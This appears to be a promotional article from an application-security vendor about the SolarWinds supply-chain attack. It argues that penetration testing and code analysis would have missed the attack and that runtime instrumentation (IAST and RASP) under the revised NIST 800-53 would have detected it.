With more news emerging on the SolarWinds cyberattack, its severity and ubiquitous reach continue to expand. Many are now heralding it as the “hack of the decade.” It exposed “god access” to the perpetrators, allegedly granting access to over 18,000 organizations. While the vulnerable software was in the context of a software supply chain, the fact that it was a software hack is indisputable. Malicious actors get inside networks through various doors, and applications are the top entry point. CEOs, CIOs, CTOs, and CISOs must bring software security to the forefront of their list of 2021 priorities.
In response to the SolarWinds hack, politicians and other officials are calling for stricter software security policies and controls from wide-ranging sources. A recent article in Politico reviews a list of recommendations and related arguments being made. Bryan Ware, the former assistant director for cybersecurity at the Cybersecurity and Infrastructure Security Agency (CISA), notes that “security is not a significant consideration or even well understood. Plenty of sophisticated CIOs bought and deployed SolarWinds’ software.” Representative Jim Langevin (R.I.), who is co-founder of the Congressional Cybersecurity Caucus, adds that “Congress needs to incentivize software companies to make their software more secure, which could require expensive changes.”
Software Acceleration Creates Business Risk
There are a number of reasons behind the increased risk that software poses—with pressure to write more code and release it faster at the top of the list. One might assume that the push for speed might have diminished as more organizations adopt Agile and DevOps approaches. But that isn’t the case. For example, Contrast Security recently found in its State of DevSecOps Report that 79% of organizations are under greater pressure to accelerate their development cycles. One of the outcomes is that developers are skipping security processes when releasing code: 55% say they often or sometimes do so to meet release cycle deadlines.
During the days of waterfall development, application security consisted of running penetration tests before releasing code. But the adoption of Agile and DevOps has prompted application security to shift left so that vulnerabilities in software can be fixed during development cycles. Legacy application security approaches struggle to provide the comprehensive, continuous observability needed to minimize risk while empowering developers to scale in terms of the quantity of code being written as well as the frequency of its release cycles.
In the case of the SolarWinds hack, attackers broke into the company and changed application code. This is evident because the binary that reaches out to download a command-and-control (C&C) payload is cryptographically signed with a SolarWinds key. The integrity of the software development process was compromised. SolarWinds’ customers are now at risk not simply because of the open backdoor but because its own internal software processes and controls were not locked down as should have been the case.
The reality today is that the network perimeter—internal or external—no longer exists. Organizations must secure and protect all software, regardless of where it is found—in the public cloud, in a private cloud, internal applications, Software-as-a-Service (SaaS) applications, or customer-facing web applications. Software vulnerabilities can and will be exploited. Indeed, in the aforementioned State of DevSecOps Report, 95% of organizations reported at least one successful application exploitation in the past year. Most are in vulnerable applications or open-source libraries with known exploits.
Delimiting the Failings of Legacy Application Security
Many of the previous techniques involve “strobe-light style security,” which makes it impossible to ever really understand the security posture of any application. In the case of the SolarWinds hack, attackers breached the upstream vendor, attacked the update mechanism, and then waited for agencies to apply the update, which they did in the name of security. As to the SolarWinds supply chain, many of the existing security controls would not have caught the issue anyway, simply because they either cannot be done in time or look at the wrong thing.
Penetration Testing as a Potential Means of Security
Penetration testing was an ineffective control because the attack did not engage any vulnerabilities. Even if testers had done a 100% fully comprehensive review of the application, the attack did not rely on any penetration. While it is possible that someone could have spotted the attempt to download remote payloads in the application’s binary through a reverse engineering/decompilation tool like Ghidra, this is well outside the scope of penetration testing. By attacking the update mechanism, the attackers made it extremely unlikely that even the most astute, most dedicated penetration tester could detect that anything was wrong. Further, the breach occurred elsewhere in SolarWinds, with the attackers modifying the application itself.
It also does not make financial or logistical sense for companies to analyze vendor software with a level of rigor even close to what is desired (and often not done) by the vendor. Penetration testing is most often done by the software creator or the organization that funded development. For custom software, firms have one group that creates the software (developers) and another group (application security) that evaluates its security before release. With security as a nonfunctional requirement, it does not make sense for each buyer to fund a detailed manual review to find issues for the vendor.
Code Analysis as Another Means of Security
Another application security technique is code analysis, either source or binary. Here, code analysis requires access to the code or application as it is put together. While code analysis shifts application security left in development, it still would have been inadequate in detecting the SolarWinds hack. If code analysis were in effect with the SolarWinds distribution analysis, it would evaluate two different components: the application and the update. The SolarWinds Orion application was not vulnerable itself, so code analysis would not have revealed any issues. The update would have altered portions of the underlying application, which is itself not a part of the update. As a result, even the best code analyzer would have been unable to even begin seeing that something was wrong.
Specifically, looking at the code or binary is a common yet ineffective technique. The National Institute of Standards and Technology (NIST) 800-53 SA11.1 discusses code analysis as an effective control. And while its advice has strength, it is only effective in instances where the organization has all code together at the same time. To circumvent this issue, attackers split code into bundles to mask intent.
Another example of this occurred with the UK’s oversight of Huawei, whereby it monitored backdoors on networking equipment for malicious infiltration or data exfiltration. Thus, even though the oversight board spent eight years performing code analysis of Huawei, it only once verified that the code they saw actually matched that running on the device. Code analysis of the SolarWinds payloads would be similarly ineffective. Even if a reviewer had the original code and update, the update itself worked by swapping functions in the Windows registry and obtaining remote code—changes visible only within running software.
Applying the Latest Updates to the NIST 800-53 Cybersecurity Framework
One answer to the problem is the adoption and enforcement of security standards. Today, government agencies typically evaluate software security through two key lenses: the NIST 800-53 Cybersecurity Framework that specifies application security standards, and various Security Technical Implementation Guides (STIGs) that explain more of the specifics of where and how to implement controls.
The security industry made a major advancement in 2020 for application verification with the introduction of new ways in the NIST 800-53 to evaluate the security of an application. The new techniques that were added enable groups to evaluate the security of software using interactive application security testing (IAST), whether they have the code or not, turning all usage into a continuous security test.
From all indications, the SolarWinds code was hijacked in its environment and cryptographically signed with SolarWinds’ encryption key. The injected code then downloaded a C&C module—meaning that the only time the application exploit could have been detected was when the software was running. Thus, prior to the publication of NIST 800-53 draft revision v5, adherence to the NIST security standards would not have prevented the SolarWinds hack. However, employing IAST to continuously analyze the software using instrumentation to embed security in running software during development and runtime application self-protection (RASP) in production runtime would have detected the exploit.
Security Instrumentation for Continuous, Accurate Application Security
For organizations that host third-party applications in their data center or private cloud, the same continuous monitoring capabilities in development and production using IAST and RASP apply. Here, the maxim “Don’t trust but verify” is apropos. With tens of thousands of organizations running SaaS-based and on-premises applications in their own data centers and private clouds, there is a significant opportunity to ratchet up the security and risk protections for them.
For more information on security instrumentation and how it provides continuous, accurate vulnerability analysis and detection, listen to the Inside AppSec Podcast interview with Contrast Security’s CTO and Co-Founder Jeff Williams (“Reexamining Application Security Post-SolarWinds Hack”).